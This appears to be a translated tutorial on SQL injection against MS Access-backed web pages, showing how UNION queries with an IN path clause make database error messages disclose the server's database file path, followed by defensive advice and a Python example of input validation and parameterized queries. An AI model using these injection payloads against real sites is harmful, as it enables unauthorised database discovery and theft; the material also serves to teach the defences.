SQL injection is now popular, and many new injection methods have been discovered. Using system error messages to expose the database path is a hot topic, and today I will join in the fun.
This test applies to ACCESS (an MS SQL query does not take a file path in this way). Access provides a way to import a table from a source database into a target database.
For example (admin table) ->
If you want to create a new table in an existing external database, you can use the IN keyword. If the external database does not exist, or the table already exists, the SELECT INTO statement returns an error message.
SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
Can this be used as a subquery, turning it into the following?
Generally, a vulnerable statement looks like select * from news where id=" & request("id"), and that is where the injection happens. The following demonstration uses a set of tests against select * from news where id=" & request("id"). For convenience, each statement is written directly in the form it takes when the SQL is executed:
select * from news where id=3 and SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
Testing shows that the import cannot be performed from a subquery. The road was blocked again. Then I thought of UNION, the merge operator, and tried whether it could be used.
Note: the UNION operator (in ACCESS)
Although a UNION operation can also be regarded as a merge query, technically it is not a join. It is mentioned here because it combines data from multiple sources into one result table, which resembles certain kinds of joins. UNION operations are generally used to combine data from tables, SELECT statements or queries, omitting any duplicate rows. All data sources must have the same number of fields, but those fields do not have to be of the same data type. Suppose we have an employee table with the same structure as the customer table, and we want to merge the two tables to get a list of names and email addresses.
SELECT [Last Name], [First Name], Email FROM tblCustomers UNION SELECT [Last Name], [First Name], Email FROM tblEmployees
The UNION operation does not display records that appear in both tables. The query after UNION must have the same number of fields as the query before UNION, for example:
select id,title from news where id=3 UNION select * from admin
The two queries have different field counts, so it returns:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two data tables or queries selected in the joint query does not match.
The query can be made to work this way: select id, title from news where id=3 UNION select 1,1 from admin. As long as the number of 1s placed after UNION equals the number of fields, the query runs.
Let's see whether the statement can be turned into:
select * from news where id=3 Union SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers
Returns:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Action query cannot be used as the source of the row.
It still failed, because UNION only applies to combining queries; an action query cannot follow UNION. Maybe this road does not work, but I was still unwilling to give up.
Try:
select * from news where id=3 Union select * from
Returns:
Microsoft JET Database Engine Error '80004005' File Not Found 'C:\WINNT\system32\'.
This proves that the path can be tested successfully, just as with select * from news where id=3 and 0<>(select count(*) from ) . But with this method ACCESS always appends the MDB suffix by default; although there are ways around it, as shown above, it is too troublesome.
So I wondered whether another method could do it more simply. I recalled SELECT * INTO tblNewCustomers IN 'C:\' FROM tblCustomers. Can't the IN keyword point at a path and file name? Can that be put to use here?
Next test:
select * from news where id=3 union select * from admin in 'c:\'
The system prompts:
Microsoft JET Database Engine Error '80004005' File not found 'c:\'.
Using:
select * from news where id=3 union select * from admin in 'c:\winnt\system32\'
The system prompts:
Microsoft JET Database Engine Error '80004005' Microsoft Jet 'Database Engine cannot open the file 'c:\winnt\system32\'. It has been opened exclusively by other users or does not have permission to view data.
This method is more concise than the and 0<>(select count(*) from admin) queries, and here the guess is that the file with the MDB suffix is correct. When the guessed path and file name are correct, the data is displayed normally. But if you guess a non-MDB file, it looks like this:
Run:
select * from news where id=3 union select * from admin in 'e:\www\include\'
Returns:
Microsoft OLE DB Provider for ODBC Drivers Error '80004005' [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'e:\www\include\'
This proves that the guessed path and file are correct.
Later, because of the shortcomings of ACCESS itself, SQL injection methods emerged one after another. On the other hand, this is also because programmers pay no attention to prevention and are careless when writing programs. Careful filtering of the values passed into SQL statements is at least one gate that blocks SQL injection. Even if ACCESS itself fixes its defects, many holes are hard to guard against. It is recommended to create a custom server error page, so that this page is shown whenever the server errors. That way there is no error information to reference, and articles like this one remain for reference only.
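The two fixes the conclusion asks for, input filtering and hiding driver errors, put beside the page's vulnerable concatenation pattern. This is an added example, not code from the original article; it assumes sqlite3 as a stand-in for the Jet/ODBC connection, since only the query-building pattern matters here.

```python
import re
import sqlite3

# Assumption: sqlite3 stands in for the Jet/ODBC connection the page uses;
# the way the statement is built is what matters, not the engine.
ID_RE = re.compile(r"^[0-9]{1,9}$")


def build_query_vulnerable(user_id):
    """The page's ASP pattern: select * from news where id=" & request("id")."""
    return "select * from news where id=" + user_id


def fetch_news_vulnerable(conn, user_id):
    """Executes the concatenated text, so a UNION smuggled in the id is honoured."""
    return conn.execute(build_query_vulnerable(user_id)).fetchall()


def validate_id(user_id):
    """Accept only a plain integer; anything else is rejected before any SQL exists."""
    if not ID_RE.match(user_id):
        raise ValueError("invalid id")
    return int(user_id)


def fetch_news_safe(conn, user_id):
    """Validated value is passed as a bound parameter, never spliced into the text."""
    nid = validate_id(user_id)
    return conn.execute("select id, title from news where id=?", (nid,)).fetchall()


def handle_request(conn, user_id):
    """Generic errors only: driver messages (paths, file names) never reach the client."""
    try:
        rows = fetch_news_safe(conn, user_id)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        return 500, "Internal error"  # log the real driver message server-side instead
    return 200, rows


def make_demo_db():
    """Constructed in-memory sample news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news(id integer, title text)")
    conn.executemany("insert into news values (?, ?)", [(3, "hello"), (4, "world")])
    return conn
```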